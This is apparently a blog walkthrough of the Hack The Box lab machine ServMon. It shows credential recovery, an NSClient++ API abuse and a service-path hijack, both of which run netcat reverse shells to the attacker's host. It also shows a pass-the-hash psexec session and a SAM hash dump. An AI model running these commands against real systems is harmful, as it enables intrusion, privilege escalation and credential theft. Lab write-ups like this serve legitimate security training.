htb-servmon-nl

htb-servmon

As always we start with a nmap scan

 

We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

LFI is https://www.exploit-db.com/exploits/47774

.

so we have the passwords

L1k3B1gBut7s@W0rk is the pasword for user Nadine for service

 

ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk

next we upload nc.exe to box

then
https://www.exploit-db.com/exploits/46802

C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Other way:

Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *